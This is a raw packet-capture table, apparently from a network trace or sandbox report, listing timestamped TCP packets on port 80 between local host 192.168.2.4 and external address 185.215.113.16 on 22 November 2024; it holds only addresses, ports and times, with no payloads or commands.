Nov 22, 2024 20:35:38.732042074 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.732088089 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.732142925 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.732186079 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.733171940 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.733221054 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.733244896 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.733282089 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.734302044 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.734342098 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.734378099 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.734411001 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.735411882 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.735462904 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.735491991 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.735527039 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.736546040 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.736596107 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.736638069 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.736675978 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.737720966 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.737771034 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.737790108 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.737827063 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.738794088 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.738837957 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.738857031 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.738893986 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.739938021 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.740000010 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.740046024 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.740089893 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.741064072 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.741106033 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.741230011 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.741275072 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.742189884 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.742235899 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.742348909 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.742393970 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.743336916 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.743382931 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.743489027 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.743535995 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.744473934 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.744518042 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.744577885 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.744622946 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.745609045 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.745655060 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.745723963 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.745779037 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.746761084 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.746803999 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.746884108 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.746931076 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.747885942 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.747934103 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.748037100 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.748095036 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.749039888 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.749088049 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.749110937 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.749155045 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.750144005 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.750190973 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.750237942 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.750281096 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.751279116 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.751324892 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.751380920 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.751424074 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.752408981 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.752461910 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.886998892 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.887082100 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.887110949 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.887154102 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.887411118 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.887458086 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.887639999 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.887685061 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.887712955 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.887752056 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.888854027 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.888907909 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.888962984 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.889008045 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.889940023 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.889983892 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.889991045 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.890016079 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.891031027 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.891088963 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.891191959 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.891242027 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.892194033 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.892242908 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.892339945 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.892385960 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.893316031 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.893362045 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.893419981 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.893464088 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.894522905 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.894562960 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.894589901 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.894602060 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.895606995 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.895654917 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.895724058 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.895773888 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.896794081 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.896841049 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.896894932 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.896936893 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.897830009 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.897877932 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.897964001 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.898010015 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.898989916 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.899038076 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.899111032 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.899167061 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.900126934 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.900172949 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.900250912 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.900302887 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.901232958 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.901283979 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.901388884 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.901437998 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.902412891 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.902466059 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.902513027 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.902556896 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.903523922 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.903572083 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.903707027 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.903753042 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.904663086 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.904772997 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.904803991 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.904854059 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.905781031 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.905837059 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.905846119 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.905874014 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.906934977 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.906979084 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.907061100 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.907104015 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.908081055 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.908123016 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.908158064 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.908200979 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.909203053 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.909245014 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.909266949 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.909306049 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.910305977 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.910352945 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.910423040 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.910464048 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.911459923 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.911510944 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.911587000 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.911642075 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.912621021 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.912664890 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.912746906 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.912790060 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.913729906 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.913781881 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.913821936 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.913862944 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.914846897 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.914907932 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.915030003 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.915071011 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.916100979 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.916146994 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.916177988 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.916215897 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.917239904 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.917282104 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.917311907 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.917352915 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.918318987 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.918365955 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.918395996 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.918431997 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.919389009 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.919434071 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.919491053 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.919532061 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.920497894 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.920552015 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.920608997 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.920651913 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.921669006 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.921714067 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.921758890 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.921797991 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.922780991 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.922832012 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.922862053 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.922899008 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.923913956 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.923938036 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.923963070 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.923986912 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.925100088 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.925194979 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.925199032 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.925236940 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.926184893 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.926244020 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.926301003 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.926346064 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.927325964 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.927370071 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.927459002 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.927501917 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.928457975 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.928503990 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.928533077 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.928575039 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.929590940 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.929632902 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.929712057 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.929749966 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.930696964 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.930730104 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.930741072 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.930766106 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.931821108 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.931865931 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.931932926 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.931977987 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.932969093 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.933017015 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.933059931 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.933101892 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.934144974 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.934204102 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.934211969 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.934250116 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.935240984 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.935297966 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.935322046 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.935368061 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.936414957 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.936460018 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.936522961 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.936558962 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.937520027 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.937568903 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.937632084 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.937675953 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.938692093 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.938734055 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.938802958 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.938851118 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.939774990 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.939851046 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.939872026 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.939932108 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.940921068 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.940968990 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.941023111 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.941066980 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.942045927 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.942096949 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.942132950 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.942178965 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.943176985 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.943223953 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.943353891 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.943408966 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.944324970 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.944401979 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.944483042 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.944526911 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.945559025 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.945569992 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:38.945615053 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:38.945628881 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.079325914 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.079361916 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.079497099 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.079791069 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.079842091 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.079855919 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.079890966 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.080013990 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.080920935 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.080971956 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.081016064 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.081063032 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.082102060 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.082153082 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.082196951 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.082241058 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.083321095 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.083367109 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.083435059 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.083482981 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.084438086 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.084462881 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.084491014 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.084500074 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.085566044 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.085621119 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.085625887 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.085661888 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.086627960 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.086690903 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.086728096 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.086776018 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.087770939 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.087825060 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.087869883 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.087920904 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.088912964 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.088968039 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.089011908 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.089061022 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.090020895 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.090069056 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.090111971 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.090205908 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.091161013 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.091212034 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.091257095 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.091304064 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.092293024 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.092346907 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.092391014 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.092441082 CET	49759	80	192.168.2.4	185.215.113.16
